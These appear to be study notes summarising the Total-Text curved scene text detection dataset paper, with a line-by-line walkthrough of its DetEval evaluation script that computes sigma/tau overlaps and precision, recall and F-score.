Several other important factors are also studied:

• the practicality and quality of the ground truth
• the evaluation protocol
• the annotation process

A new scene text detection model, called Polygon-Faster-RCNN, is proposed as the Total-Text baseline.

    1 Introduction

    png

Annotation details of Total-Text. a: a Total-Text image; b: text-region binary mask; c: character-level binary mask; d: fixed-length polygon vertices, transcription (case-sensitive) and orientation annotation ('c': curved, 'm': multi-oriented).

The proposed Total-Text contains:

• 1555 scene images, 11459 annotated words
• GT that includes:
  • spatial location
  • transcription
  • pixel-level annotations for the text detection, recognition and segmentation tasks

A new scene text model, Polygon Faster-RCNN (Poly-FRCNN), is proposed. It regresses polygons rather than box parameters, so it can detect text of all orientations and bound it tightly. The proposed model reaches F-measures of 0.85, 0.72 and 0.7 on ICDAR2013, ICDAR2015 and Total-Text respectively, demonstrating its effectiveness on datasets with different properties.

    1.1 Improved ground truth

The number of polygon vertices varies across text instances. This poses a practical problem for detection frameworks such as Faster R-CNN, SSD and YOLO (all of which have inspired many scene text detection works), because they require a fixed number of vertices in the regression target.

    1.2 Optimized evaluation protocol for Total-Text

The currently recommended DetEval thresholds were not tuned with curved text in mind. A series of experiments was run to determine a new, fairer set of evaluation thresholds.

    1.3 Scene text detection annotation tool

Ground-truth annotation is the biggest bottleneck when scaling up a dataset. Karatzas et al. introduced an online annotation platform focused on quality control and database management, but the tedious, laborious annotation task itself still leaves much room for improvement. Hence Section 5 introduces the Total-Text-Tool (T3), an assistive annotation framework that reduces annotation time while still producing high-quality ground truth.

    1.4 Cross dataset experiment

Models trained on Total-Text generalize well to other scene text datasets.

    1.5 State-of-the-art analysis

Since Total-Text appeared, many works have begun to tackle curved text detection.

    2.1 Scene text datasets

    2.1.1 ICDAR2003-ICDAR2015

Series | Images | Annotation    | Characteristics
2003   | 509    | bbox          |
2011   | 484    | bbox          |
2013   | 462    | bbox          |
2015   | 1670   | quadrilateral | arbitrary orientations, out of focus

    2.1.2 MSRA-TD500

2012; features arbitrarily oriented text; 300 training and 200 test images, annotated with rotated bounding boxes.

    2.1.3 USTB-SV1K

1000 images collected from streets in six US cities, featuring multi-oriented text, annotated with rotated bounding boxes.

    2.1.4 COCO-text

2016; the largest scene text dataset to date, with 63686 images and 173589 labeled text regions. It consists mainly of horizontal and multi-oriented text plus a little curved text, annotated with bboxes.

    2.1.5 MLT

The MLT dataset is one of the most recent multi-script datasets, collected for the scene text detection, recognition and script identification tasks. It consists of 18000 images for training and validation, covering 9 languages and 6 different scripts.

    2.1.6 CTW-12k

2017; over 12000 images; Chinese and English.

    2.1.7 MTWI

One of the largest multilingual datasets to date, with 20000 images.

    2.1.8 SynthText

Contains 800k scene text images, annotated with word-level and character-level axis-aligned bounding boxes plus their transcriptions. Its drawback is that, like COCO-Text, it uses axis-aligned boxes, which do not suit multi-oriented text.

    2.1.9 CUTE80

The first scene text dataset to highlight curved text; unfortunately it has only 80 images.

    2.1.10 CTW1500

In principle the dataset closest to Total-Text. Total-Text annotates text instances at the word level, whereas CTW1500 annotates them at the line level.

    2.2 Scene text detection

    2.2.1 Scene text inspired handcrafted feature era

The era of handcrafted features inspired by scene text.

2.2.2 The emergence of CNN

The arrival of CNNs.

2.2.3 Segmentation-based scene text detection

Scene text detection based on segmentation.

2.2.4 Proposal-based scene text detection

Scene text detection based on proposals.

2.2.5 Single network scene text detection

Scene text detection with a single network.

2.2.6 Curved text detection

Curved text detection.

    3 The Total-Text dataset

    3.1 Dataset attributes

    3.1.1 Curved text is an overlooked problem

Detection performance on horizontal text is nearly saturated (F-scores around 0.9), but curved text is lacking.

3.1.2 Curved text observation

A curve is not a straight line; its angle is free to change along its entire length.

3.1.3 Detection ground truth annotation

Text instances in Total-Text are annotated at word-level granularity.

3.1.4 Recognition ground truth annotation

GT for the word recognition challenge is provided.

3.1.5 Segmentation ground truth annotation

Pixel-level GT annotation is the most time-consuming step, so several pre-processing aids are provided.

    png

Pixel-level annotation process. a: input image patch. b, c: color thresholding to separate text from background regions. d-f: removal of "non-text" regions. g: final result.

    3.1.6 Orientation annotation

Specifically, the annotation uses:

• 'h' for horizontal text
• 'm' for multi-oriented text
• 'c' for curved text

    3.1.7 Regulated polygon ground truth

The paper refines the Total-Text annotation with the following scheme, fixing the number of polygon vertices at 10 (empirically, 10 vertices are enough to tightly cover all word-level text instances in the dataset).

The new polygon ground-truth annotation procedure is illustrated in Fig. 7. First, a human annotator manually selects four distinct vertices as the start and end vertices of a word instance. The two vertices at the top corners of the word "MARLEY" (red and green dots) are used to generate three equally spaced yellow guide lines; the guide-line generation procedure is given in Algorithm 1. The annotator then picks one intercept point (marked "*") along each yellow guide line that best bounds the top edge of the word.

Algorithm 1, the guide-line generation used in the regulated polygon annotation, essentially takes an upper and a lower boundary and generates the equally spaced interior points between them, so the word's four corners plus the points on the three guide lines form the 10 vertices; a sketch of the idea follows below.
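A minimal sketch of that idea (my reconstruction, not the paper's code): linearly interpolate between the two top corners and between the two bottom corners at fractions 1/4, 1/2 and 3/4, which yields the three guide lines and hence the 3 + 3 interior vertices:

import numpy as np

def guide_lines(top_left, top_right, bottom_left, bottom_right):
    # Each guide line is the segment joining matching interpolated points
    # on the top and bottom boundaries of the word.
    lines = []
    for t in (0.25, 0.5, 0.75):
        top = (1 - t) * np.asarray(top_left, float) + t * np.asarray(top_right, float)
        bottom = (1 - t) * np.asarray(bottom_left, float) + t * np.asarray(bottom_right, float)
        lines.append((top, bottom))
    return lines

The annotator's chosen intercept on each line, together with the four corners, gives the 10-vertex polygon.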

    png


    3.2 Dataset statistics

    3.2.1 Strength in numbers

Total-Text is split into a training set and a test set with 1255 and 300 images respectively. Fig. 10 shows a range of statistics. In total there are 11459 annotated text instances, 7.37 per image on average. More than half of the images in Total-Text contain two or more different orientations, averaging 1.8 orientations per image.

The dataset collection also considered quality, including scene complexity, e.g. text-like and low-contrast backgrounds and varied font types and sizes.

    3.2.2 Orientation diversity

About half of the text instances are curved; the rest is split almost evenly between horizontal and multi-oriented. Although every image was collected with curved text in mind, the other orientations still account for half of the instances. A closer look at Total-Text shows that curved text usually co-occurs with horizontal or multi-oriented text; this mix of orientations challenges detection algorithms to be robust and general with respect to text orientation.

    3.2.3 Scenery diversity

The scenery in Total-Text images is also diverse.

    4 Evaluation protocol

    4.1 DetEval

Total-Text was the first to adopt the DetEval protocol. However, the recommended tp and tr thresholds (0.4 and 0.8 respectively) were not tuned for the curved text and polygon ground truth in Total-Text.

    4.2 PASCAL VOC

Like CTW1500 and ICDAR2015, the PASCAL VOC evaluation method also applies to Total-Text.

    4.3 Intersection area between polygons

Computing the intersection between predicted and ground-truth regions is the core of both the DetEval and Pascal VOC protocols.

    5 Scene text detection annotation tool

An annotation tool, the Total-Text-Tool (T3), is proposed; it reduces annotation time by 25% with an 84% agreement rate with human annotators.

    5.1 Total-Text-Tool

    5.2 Experiment setup

    5.3 Performance analysis

    6 Polygon-faster-RCNN

    6.1 Text line encoding method

The conventional regression target $(x_m,y_m,w,h)$ used in Faster R-CNN, SSD and YOLO works only for axis-aligned rectangular boxes, not for polygons.

    6.1.1 Variants of Poly-FRCNN

Poly-FRCNN-5 is a scaled-up version of Poly-FRCNN-3, with 10 more parameters in its regression head.

    6.1.2 Encode

    6.1.3 Decode

    6.2 Anchor polygons parameterization

    6.3 Implementation details

    6.3.1 Feature extractor

The model uses Inception-ResNet-v2 as the feature extractor.

    6.3.2 Anchor boxes

    6.3.3 Loss function

    6.3.4 Training

All models followed the same training schedule:

• They are first initialized with ImageNet pre-trained weights.

• Training then starts with 100K iterations on SynthText, followed by another 100K iterations on real-world data from COCO-Text. Finally, the models are fine-tuned on the target training set for another 50K iterations.

The initial learning rate on the largest dataset (SynthText) was set to 0.003, lowered to 0.0003 from the start of COCO-Text training, and kept constant for the rest of training.

100K images from SynthText were randomly selected for the first training stage.

During the second stage, roughly 13K COCO-Text training images containing at least one legible text instance were used.

Finally, the 1255 images of the Total-Text training set were used in the fine-tuning stage.

    6.3.5 Testing

Testing is kept as simple as possible: no post-processing or multi-scale testing beyond standard non-maximum suppression (NMS).

    6.4 Evaluation

    6.4.1 Dataset

Poly-FRCNN is evaluated on ICDAR2013, ICDAR2015 and Total-Text. ICDAR2013 and ICDAR2015 are chosen to demonstrate its performance on horizontal and multi-oriented text respectively.

    6.4.2 Evaluation Protocol

Performance on ICDAR2013 is evaluated with the DetEval recommendations (i.e. $tp=0.4$ and $tr=0.8$) for a fair comparison with prior art. For Total-Text, $tp=0.6$ and $tr=0.7$ are used; in addition, the results on ICDAR2015 and Total-Text use the Pascal VOC method's standard $0.5$ IoU threshold.

    6.4.3 Performance analysis

    6.4.4 Box-FRCNN versus Poly-FRCNN-3

    6.4.5 Poly-Baseline versus Poly-FRCNN-3

    6.4.6 Poly-FRCNN-5

    6.4.7 Inference time

    6.4.8 Performance on other curved text datasets

Besides Total-Text, the proposed model is also evaluated on the other curved text datasets, CUTE-80 and CTW1500; Poly-FRCNN-3 reaches F-scores of 0.65 and 0.72 on them respectively (Table 5). Note that the annotation granularity in CUTE80 is inconsistent (a mix of word level and line level), so it was relabeled before evaluation.

    6.5 Cross datasets experiment

    png

    6.5.1 Pretraining on SynthText and COCO-Text only

The model trained only on SynthText and COCO-Text (first row of Table 6) generally performs worse than the models fine-tuned on the respective datasets. While it remains competitive on ICDAR2013 and ICDAR2015 even without fine-tuning, it is the worst on Total-Text, trailing the best model (fourth row) by a large 0.24 gap in F-score.

    6.5.2 Fine-tuning on ICDAR2013 and ICDAR2015

ICDAR2013 consists mostly of horizontal text with axis-aligned box ground truth, so it is no surprise that fine-tuning on it does not improve performance on Total-Text.

    6.5.3 Fine-tuning on Total-Text

Although fine-tuned only on Total-Text, the model achieves good results on the other two datasets, suggesting that Total-Text's data is diverse enough to support model generalization.

    6.6 State-of-the-art analysis

Discusses other works; omitted.

    7 Conclusion

Repository

Download the code from GitHub: cs-chan/Total-Text-Dataset: Total Text Dataset. It consists of 1555 images with more than 3 different text orientations: Horizontal, Multi-Oriented, and Curved, one of a kind. (github.com):

    png

    Annotation_tools

    png

An annotation tool they provide; it appears to be written in Objective-C.

    ​ Total-Text-Tool (T3) is a guided annotation framework that is designed to reduce annotation time. In our experiment, T3 reduces annotation time by 25%. For more details of T3 and all related experiments, please refer to our IJDAR journal publication.

    ​ We make all three variants of T3 available.

1. T3_v1 - the baseline version, the suggestion mechanism is not incorporated (fully manual, no suggestions).
2. T3_v2 - the suggestion mechanism is incorporated, only suggest rectangle bounding box, polygon is not suggested (bbox suggestions only).
3. T3_v3 - suggests both rectangle and polygon bounding box (can output both bboxes and polygons).

    ​ Kindly refer to ‘T3_use_cases’ for different use cases of T3_v3.

    Baseline

There are two models:

• Polygon-Faster-RCNN-3 (P3)
• Polygon-Faster-RCNN-5 (P5)

Pre-trained models are required, but they seem impossible to get hold of.

    Dataset

    ​ The Total-Text dataset can be downloaded at this https URL (size = 441Mb).

    Evaluation_Protocol

This code is the official evaluation protocol implementation for Total-Text, offering two methods: DetEval and the Pascal VOC protocol.

    Deteval

Thresholds of $tr=0.7$ and $tp=0.6$ are recommended for fairer evaluation with polygon ground truth and detection formats.

A walkthrough of Deteval.py:

• Definitions
from os import listdir
from scipy import io
import numpy as np
# mask counting version
# from polygon_wrapper import iod
# from polygon_wrapper import area_of_intersection
# from polygon_wrapper import area

# polygon based version
from polygon_fast import iod
from polygon_fast import area_of_intersection
from polygon_fast import area
from tqdm import tqdm

try:  # python2
    range = xrange
except Exception:
    # python3
    range = range

"""
Input format: y0,x0, ..... yn,xn. Each detection is separated by the end of line token ('\n')'
"""

input_dir = '../Examples/Prediction/'  # detection directory goes here
gt_dir = '../Examples/Groundtruth/'  # gt directory goes here
fid_path = '../Examples/'  # output text file directory goes here

allInputs = listdir(input_dir)
    • def input_reading_mod()
def input_reading_mod(input_dir, input):
    """This helper reads input from txt files"""
    with open('%s/%s' % (input_dir, input), 'r', encoding='latin-1') as input_fid:
        pred = input_fid.readlines()
    det = [x.strip('\n') for x in pred]
    return det

This defines a function named input_reading_mod, which reads input from text files.

Its parameters are input_dir and input, the input directory and the file name to read.

It opens the text file at the given path and reads it line by line. The full path is built with '%s/%s' % (input_dir, input), the file is opened in 'r' (read-only) mode, and encoding='latin-1' specifies the Latin-1 encoding.

readlines then reads the file contents line by line into the pred list, and the list comprehension [x.strip('\n') for x in pred] strips the trailing newline from each line, producing the processed list det.

Finally, the function returns the det list.

    • gt_reading_mod()
def gt_reading_mod(gt_dir, gt_id):
    """This helper reads groundtruths from mat files"""
    gt_id = gt_id.split('.')[0]
    gt = io.loadmat('%s/poly_gt_%s.mat' % (gt_dir, gt_id))
    gt = gt['polygt']
    return gt

This defines a function named gt_reading_mod, which reads annotation data from .mat files.

Its parameters are gt_dir and gt_id, the annotation directory and the file name to read.

It first strips the extension from gt_id via .split('.')[0].

It then reads the .mat file at the path built by '%s/poly_gt_%s.mat' % (gt_dir, gt_id) using io.loadmat, which loads the file's contents into a dictionary gt.

Next, the data under the key polygt is extracted from the dictionary and stored back in gt.

Finally, the function returns gt.

    • detection_filtering()
def detection_filtering(detections, groundtruths, threshold=0.5):
    for gt_id, gt in enumerate(groundtruths):
        if (gt[5] == '#') and (gt[1].shape[1] > 1):
            gt_x = list(map(int, np.squeeze(gt[1])))
            gt_y = list(map(int, np.squeeze(gt[3])))
            for det_id, detection in enumerate(detections):
                detection = detection.split(',')
                detection = list(map(int, detection))
                det_y = detection[0::2]
                det_x = detection[1::2]
                det_gt_iou = iod(det_x, det_y, gt_x, gt_y)
                if det_gt_iou > threshold:
                    detections[det_id] = []

    detections[:] = [item for item in detections if item != []]
    return detections

This defines a function named detection_filtering, which removes detections that overlap heavily with "do not care" ground-truth regions.

Its parameters are detections and groundtruths, plus an optional threshold for the overlap ratio, defaulting to 0.5.

It iterates over all annotations and, for each one, checks whether it is a "do not care" region (gt[5] == '#', where '#' marks a don't-care transcription) with more than one vertex (gt[1].shape[1] > 1). If both hold, the annotation's vertices are extracted into the gt_x and gt_y lists.

It then iterates over all detections: each detection string is split on commas and converted to a list of integers, and its y and x coordinates are taken from the even and odd positions into det_y and det_x respectively.

Next, the iod function computes the intersection-over-detection between the detection and the don't-care region, i.e. the fraction of the detection's area covered by it. If this exceeds the threshold, the detection is removed from detections by setting it to the empty list [].

Finally, the comprehension [item for item in detections if item != []] keeps only the non-empty detections.

The function returns the filtered detections list.

    • sigma_calculation()
def sigma_calculation(det_x, det_y, gt_x, gt_y):
    """
    sigma = inter_area / gt_area
    """
    # print(area_of_intersection(det_x, det_y, gt_x, gt_y))
    return np.round((area_of_intersection(det_x, det_y, gt_x, gt_y) / area(gt_x, gt_y)), 2)

This defines a function named sigma_calculation, which computes the recall-side overlap between a detection and an annotation.

Its parameters are det_x, det_y, gt_x and gt_y, the vertex coordinates of the detection and the annotation.

It computes the overlap (sigma) according to:

sigma = inter_area / gt_area

where inter_area is the area of the intersection between the detection and the annotation, and gt_area is the area of the annotation.

Internally it calls the two helpers area_of_intersection and area to compute the intersection area and the annotation area, divides the former by the latter, and rounds the result to two decimal places with np.round.

Finally, it returns the computed overlap.

    • tau_calculation()
def tau_calculation(det_x, det_y, gt_x, gt_y):
    """
    tau = inter_area / det_area
    """
    return np.round((area_of_intersection(det_x, det_y, gt_x, gt_y) / area(det_x, det_y)), 2)

This defines a function named tau_calculation, which computes the precision-side overlap between a detection and an annotation.

Its parameters are det_x, det_y, gt_x and gt_y, the vertex coordinates of the detection and the annotation.

It computes the overlap (tau) according to:

tau = inter_area / det_area

where inter_area is the area of the intersection between the detection and the annotation, and det_area is the area of the detection.

Internally it calls the two helpers area_of_intersection and area to compute the intersection area and the detection area, divides the former by the latter, and rounds the result to two decimal places with np.round.

Finally, it returns the computed overlap.
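A toy illustration of the difference between the two (hypothetical numbers): if a detection of area 80 covers 60 pixels of a 100-pixel ground truth, then

inter_area, gt_area, det_area = 60.0, 100.0, 80.0
sigma = inter_area / gt_area  # 0.60, fails tr = 0.7 on the recall side
tau = inter_area / det_area   # 0.75, passes tp = 0.6 on the precision side

so sigma asks "how much of the GT is covered" while tau asks "how much of the detection is actually text".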

• Variable definitions
    global_tp = 0
    global_fp = 0
    global_fn = 0
    global_sigma = []
    global_tau = []
    tr = 0.7
    tp = 0.6
    fsc_k = 0.8
    k = 2

This code defines the global variables global_tp, global_fp, global_fn, global_sigma and global_tau, initializing the counters to 0 and the tables to empty lists.

Here, global_tp is the global number of true positives, global_fp the global number of false positives, global_fn the global number of false negatives, and global_sigma and global_tau hold the per-image sigma and tau overlap tables.

Next come the protocol parameters: tr is the recall-side threshold applied to sigma, tp the precision-side threshold applied to tau, fsc_k the fractional credit given to one-to-many and many-to-one (split/merge) matches, and k the minimum number of overlapping candidates required before such a match is considered.

This block only initializes these variables and parameters; it performs no other logic.

• Evaluation
for input_id in tqdm(allInputs):
    if (input_id != '.DS_Store') and (input_id != 'Pascal_result.txt') and (
            input_id != 'Pascal_result_curved.txt') and (input_id != 'Pascal_result_non_curved.txt') and (
            input_id != 'Deteval_result.txt') and (input_id != 'Deteval_result_curved.txt') \
            and (input_id != 'Deteval_result_non_curved.txt'):
        # print(input_id)
        detections = input_reading_mod(input_dir, input_id)
        groundtruths = gt_reading_mod(gt_dir, input_id)
        detections = detection_filtering(detections, groundtruths)  # filters detections overlapping with DC area
        dc_id = np.where(groundtruths[:, 5] == '#')
        groundtruths = np.delete(groundtruths, (dc_id), (0))

        local_sigma_table = np.zeros((groundtruths.shape[0], len(detections)))
        local_tau_table = np.zeros((groundtruths.shape[0], len(detections)))

        for gt_id, gt in enumerate(groundtruths):
            if len(detections) > 0:
                for det_id, detection in enumerate(detections):
                    detection = detection.split(',')
                    detection = list(map(int, detection))
                    det_y = detection[0::2]
                    det_x = detection[1::2]
                    gt_x = list(map(int, np.squeeze(gt[1])))
                    gt_y = list(map(int, np.squeeze(gt[3])))

                    local_sigma_table[gt_id, det_id] = sigma_calculation(det_x, det_y, gt_x, gt_y)
                    local_tau_table[gt_id, det_id] = tau_calculation(det_x, det_y, gt_x, gt_y)

        global_sigma.append(local_sigma_table)
        global_tau.append(local_tau_table)

global_accumulative_recall = 0
global_accumulative_precision = 0
total_num_gt = 0
total_num_det = 0

This code loops over every element input_id of the allInputs list.

Inside the loop, a chain of conditions first filters out special entries such as .DS_Store and the various result files (Pascal_result.txt and so on). Then input_reading_mod reads the detections from input_dir and gt_reading_mod reads the annotations from gt_dir.

Next, detection_filtering drops detections that overlap with don't-care (DC) regions. The indices of the DC entries in the annotations are then located, and np.delete removes them from the annotation array.

Two zero matrices, local_sigma_table and local_tau_table, are created with shape (groundtruths.shape[0], len(detections)) to hold the overlap values between every annotation and every detection.

The two nested for loops then fill them in: the detection and annotation coordinates are parsed, and sigma_calculation and tau_calculation compute the overlaps, which are stored in local_sigma_table and local_tau_table.

Finally, local_sigma_table and local_tau_table are appended to the global_sigma and global_tau lists, which collect the overlap tables of all images.

The last few lines initialize global_accumulative_recall, global_accumulative_precision, total_num_gt and total_num_det to 0; these accumulators are used by the matching code that follows.

    • one_to_one()
def one_to_one(local_sigma_table, local_tau_table, local_accumulative_recall,
               local_accumulative_precision, global_accumulative_recall, global_accumulative_precision,
               gt_flag, det_flag):
    for gt_id in range(num_gt):
        gt_matching_qualified_sigma_candidates = np.where(local_sigma_table[gt_id, :] > tr)
        gt_matching_num_qualified_sigma_candidates = gt_matching_qualified_sigma_candidates[0].shape[0]
        gt_matching_qualified_tau_candidates = np.where(local_tau_table[gt_id, :] > tp)
        gt_matching_num_qualified_tau_candidates = gt_matching_qualified_tau_candidates[0].shape[0]

        det_matching_qualified_sigma_candidates = np.where(local_sigma_table[:, gt_matching_qualified_sigma_candidates[0]] > tr)
        det_matching_num_qualified_sigma_candidates = det_matching_qualified_sigma_candidates[0].shape[0]
        det_matching_qualified_tau_candidates = np.where(local_tau_table[:, gt_matching_qualified_tau_candidates[0]] > tp)
        det_matching_num_qualified_tau_candidates = det_matching_qualified_tau_candidates[0].shape[0]

        if (gt_matching_num_qualified_sigma_candidates == 1) and (gt_matching_num_qualified_tau_candidates == 1) and \
                (det_matching_num_qualified_sigma_candidates == 1) and (det_matching_num_qualified_tau_candidates == 1):
            global_accumulative_recall = global_accumulative_recall + 1.0
            global_accumulative_precision = global_accumulative_precision + 1.0
            local_accumulative_recall = local_accumulative_recall + 1.0
            local_accumulative_precision = local_accumulative_precision + 1.0

            gt_flag[0, gt_id] = 1
            matched_det_id = np.where(local_sigma_table[gt_id, :] > tr)
            det_flag[0, matched_det_id] = 1
    return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag

This code defines a function named one_to_one, which takes local_sigma_table, local_tau_table, local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag and det_flag.

Its for loop iterates gt_id from 0 to num_gt, the number of annotations.

Inside the loop, np.where first finds the detections satisfying local_sigma_table[gt_id, :] > tr and those satisfying local_tau_table[gt_id, :] > tp, and counts them into gt_matching_num_qualified_sigma_candidates and gt_matching_num_qualified_tau_candidates.

It then looks along the other axis: for those candidate detection columns, np.where counts how many ground truths qualify, giving det_matching_num_qualified_sigma_candidates and det_matching_num_qualified_tau_candidates.

A combined condition then checks for a "one-to-one" match: exactly one detection qualifies for this ground truth, and exactly one ground truth qualifies for that detection, under both thresholds. If so, the recall and precision accumulators are each incremented by 1 and the corresponding flags are set to 1.

Finally, the function returns the updated local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag and det_flag.
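A compact (and slightly paraphrased) restatement of the one-to-one condition for a GT row g and detection column d, given a sigma table S and a tau table T, would be:

import numpy as np

def is_one_to_one(S, T, g, d, tr=0.7, tp=0.6):
    # g and d must qualify each other uniquely under both thresholds
    return bool(S[g, d] > tr and T[g, d] > tp
                and np.sum(S[g, :] > tr) == 1 and np.sum(S[:, d] > tr) == 1
                and np.sum(T[g, :] > tp) == 1 and np.sum(T[:, d] > tp) == 1)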

    • one_to_many()
def one_to_many(local_sigma_table, local_tau_table, local_accumulative_recall,
                local_accumulative_precision, global_accumulative_recall, global_accumulative_precision,
                gt_flag, det_flag):
    for gt_id in range(num_gt):
        # skip the following if the groundtruth was matched
        if gt_flag[0, gt_id] > 0:
            continue

        non_zero_in_sigma = np.where(local_sigma_table[gt_id, :] > 0)
        num_non_zero_in_sigma = non_zero_in_sigma[0].shape[0]

        if num_non_zero_in_sigma >= k:
            ####search for all detections that overlaps with this groundtruth
            qualified_tau_candidates = np.where((local_tau_table[gt_id, :] >= tp) & (det_flag[0, :] == 0))
            num_qualified_tau_candidates = qualified_tau_candidates[0].shape[0]

            if num_qualified_tau_candidates == 1:
                if ((local_tau_table[gt_id, qualified_tau_candidates] >= tp) and (local_sigma_table[gt_id, qualified_tau_candidates] >= tr)):
                    # became an one-to-one case
                    global_accumulative_recall = global_accumulative_recall + 1.0
                    global_accumulative_precision = global_accumulative_precision + 1.0
                    local_accumulative_recall = local_accumulative_recall + 1.0
                    local_accumulative_precision = local_accumulative_precision + 1.0

                    gt_flag[0, gt_id] = 1
                    det_flag[0, qualified_tau_candidates] = 1
            elif (np.sum(local_sigma_table[gt_id, qualified_tau_candidates]) >= tr):
                gt_flag[0, gt_id] = 1
                det_flag[0, qualified_tau_candidates] = 1

                global_accumulative_recall = global_accumulative_recall + fsc_k
                global_accumulative_precision = global_accumulative_precision + num_qualified_tau_candidates * fsc_k

                local_accumulative_recall = local_accumulative_recall + fsc_k
                local_accumulative_precision = local_accumulative_precision + num_qualified_tau_candidates * fsc_k

    return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag

This code defines a function named one_to_many, which is similar to one_to_one and takes the same parameters.

Its for loop iterates gt_id from 0 to num_gt, the number of annotations.

Inside the loop, it first skips annotations that were already matched: if gt_flag[0, gt_id] is greater than 0, it continues to the next iteration.

Next, np.where finds the indices satisfying local_sigma_table[gt_id, :] > 0 and counts them into num_non_zero_in_sigma.

Then, if num_non_zero_in_sigma >= k, the next step runs.

There, np.where finds the indices satisfying (local_tau_table[gt_id, :] >= tp) & (det_flag[0, :] == 0) and counts them into num_qualified_tau_candidates.

If num_qualified_tau_candidates equals 1, it further checks whether the annotation and the single candidate detection satisfy the one-to-one conditions, i.e. both overlap thresholds are met; if so, the counters are incremented by 1 and the corresponding flags are set to 1.

If num_qualified_tau_candidates is greater than 1 and np.sum(local_sigma_table[gt_id, qualified_tau_candidates]) >= tr, this is a one-to-many (split) match: the flags are set, recall is credited with fsc_k, and precision is credited with num_qualified_tau_candidates * fsc_k.

Finally, the function returns the updated local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag and det_flag.

    • many_to_one()
def many_to_one(local_sigma_table, local_tau_table, local_accumulative_recall,
                local_accumulative_precision, global_accumulative_recall, global_accumulative_precision,
                gt_flag, det_flag):
    for det_id in range(num_det):
        # skip the following if the detection was matched
        if det_flag[0, det_id] > 0:
            continue

        non_zero_in_tau = np.where(local_tau_table[:, det_id] > 0)
        num_non_zero_in_tau = non_zero_in_tau[0].shape[0]

        if num_non_zero_in_tau >= k:
            ####search for all groundtruths that overlap with this detection
            qualified_sigma_candidates = np.where((local_sigma_table[:, det_id] >= tp) & (gt_flag[0, :] == 0))
            num_qualified_sigma_candidates = qualified_sigma_candidates[0].shape[0]

            if num_qualified_sigma_candidates == 1:
                if ((local_tau_table[qualified_sigma_candidates, det_id] >= tp) and (local_sigma_table[qualified_sigma_candidates, det_id] >= tr)):
                    # became an one-to-one case
                    global_accumulative_recall = global_accumulative_recall + 1.0
                    global_accumulative_precision = global_accumulative_precision + 1.0
                    local_accumulative_recall = local_accumulative_recall + 1.0
                    local_accumulative_precision = local_accumulative_precision + 1.0

                    gt_flag[0, qualified_sigma_candidates] = 1
                    det_flag[0, det_id] = 1
            elif (np.sum(local_tau_table[qualified_sigma_candidates, det_id]) >= tp):
                det_flag[0, det_id] = 1
                gt_flag[0, qualified_sigma_candidates] = 1

                global_accumulative_recall = global_accumulative_recall + num_qualified_sigma_candidates * fsc_k
                global_accumulative_precision = global_accumulative_precision + fsc_k

                local_accumulative_recall = local_accumulative_recall + num_qualified_sigma_candidates * fsc_k
                local_accumulative_precision = local_accumulative_precision + fsc_k
    return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag

This code defines a function named many_to_one, similar to the earlier one_to_one and one_to_many functions and taking the same parameters.

Its for loop iterates det_id from 0 to num_det, the number of detections.

Inside the loop, it first skips detections that were already matched: if det_flag[0, det_id] is greater than 0, it continues to the next iteration.

Next, np.where finds the indices satisfying local_tau_table[:, det_id] > 0 and counts them into num_non_zero_in_tau.

Then, if num_non_zero_in_tau >= k, the next step runs.

There, np.where finds the indices satisfying (local_sigma_table[:, det_id] >= tp) & (gt_flag[0, :] == 0) and counts them into num_qualified_sigma_candidates.

If num_qualified_sigma_candidates equals 1, it further checks whether the detection and the single candidate annotation satisfy the one-to-one conditions, i.e. both overlap thresholds are met; if so, the counters are incremented by 1 and the corresponding flags are set to 1.

If num_qualified_sigma_candidates is greater than 1 and np.sum(local_tau_table[qualified_sigma_candidates, det_id]) >= tp, this is a many-to-one (merge) match: the flags are set, recall is credited with num_qualified_sigma_candidates * fsc_k, and precision is credited with fsc_k.

Finally, the function returns the updated local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag and det_flag.

• Aggregating and saving the results
for idx in range(len(global_sigma)):
    print(allInputs[idx])
    local_sigma_table = global_sigma[idx]
    local_tau_table = global_tau[idx]

    num_gt = local_sigma_table.shape[0]
    num_det = local_sigma_table.shape[1]

    total_num_gt = total_num_gt + num_gt
    total_num_det = total_num_det + num_det

    local_accumulative_recall = 0
    local_accumulative_precision = 0
    gt_flag = np.zeros((1, num_gt))
    det_flag = np.zeros((1, num_det))

    #######first check for one-to-one case##########
    local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
        gt_flag, det_flag = one_to_one(local_sigma_table, local_tau_table,
                                       local_accumulative_recall, local_accumulative_precision,
                                       global_accumulative_recall, global_accumulative_precision,
                                       gt_flag, det_flag)

    #######then check for one-to-many case##########
    local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
        gt_flag, det_flag = one_to_many(local_sigma_table, local_tau_table,
                                        local_accumulative_recall, local_accumulative_precision,
                                        global_accumulative_recall, global_accumulative_precision,
                                        gt_flag, det_flag)

    #######then check for many-to-one case##########
    local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
        gt_flag, det_flag = many_to_one(local_sigma_table, local_tau_table,
                                        local_accumulative_recall, local_accumulative_precision,
                                        global_accumulative_recall, global_accumulative_precision,
                                        gt_flag, det_flag)

    fid = open(fid_path, 'a+')
    try:
        local_precision = local_accumulative_precision / num_det
    except ZeroDivisionError:
        local_precision = 0

    try:
        local_recall = local_accumulative_recall / num_gt
    except ZeroDivisionError:
        local_recall = 0

    temp = ('%s______/Precision:_%s_______/Recall:_%s\n' % (allInputs[idx], str(local_precision), str(local_recall)))
    fid.write(temp)
    fid.close()

try:
    recall = global_accumulative_recall / total_num_gt
except ZeroDivisionError:
    recall = 0

try:
    precision = global_accumulative_precision / total_num_det
except ZeroDivisionError:
    precision = 0

try:
    f_score = 2 * precision * recall / (precision + recall)
except ZeroDivisionError:
    f_score = 0

fid = open(fid_path, 'a')
temp = ('Precision:_%s_______/Recall:_%s\n' % (str(precision), str(recall)))
fid.write(temp)
fid.close()
print(temp)

This code loops over every element of the global_sigma list.

In each iteration it first prints allInputs[idx], then assigns global_sigma[idx] to local_sigma_table and global_tau[idx] to local_tau_table.

